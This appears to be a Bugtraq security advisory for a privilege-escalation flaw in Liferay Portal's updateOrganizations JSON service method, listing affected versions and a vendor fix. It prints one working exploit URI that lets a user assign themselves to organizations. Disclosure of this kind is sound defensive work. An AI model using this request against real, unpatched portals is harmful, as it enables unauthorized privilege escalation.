Liferay Portal 'updateOrganizations()' Method Security Bypass Vulnerability

Bugtraq ID:	53509
Class:	Access Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	May 14 2012 12:00AM
Updated:	May 18 2012 05:40PM
Credit:	Jelmer Kuperus
Vulnerable:	Liferay Enterprise Portal 6.1 ce Liferay Enterprise Portal 6.1 Liferay Enterprise Portal 6.0.6 ce Liferay Enterprise Portal 6.0.5 ce Liferay Enterprise Portal 6.0
Not Vulnerable:	Liferay Enterprise Portal 6.1 GA1 EE Liferay Enterprise Portal 6.1 GA1 CE

Liferay Portal 'updateOrganizations()' Method Security Bypass Vulnerability

Liferay Portal is prone to a security-bypass vulnerability.

Successfully exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions with elevated privileges.

Liferay Portal 'updateOrganizations()' Method Security Bypass Vulnerability

An attacker can exploit this issue through a browser.

The following exploit URI is available:

http://www.example.com/c/portal/json_service?serviceClassName=com.liferay.portal.service.UserServiceUtil&serviceMethodName=updateOrganizations&serviceParameters=%5B%27userId%27%2C+%27organizationIds%27%5D&userId=YOUR_USER_ID&organizationIds=TARGET_ORGANIZATION_ID

Liferay Portal 'updateOrganizations()' Method Security Bypass Vulnerability

Solution:
Reports indicates that this issue has been fixed. Please contact the vendor for more information.

Liferay Portal 'updateOrganizations()' Method Security Bypass Vulnerability

References:

• Liferay Portal Product Page (Liferay)
  
• Liferay users can assign themselves to organizations, leading to possible privi (Jelmer Kuperus)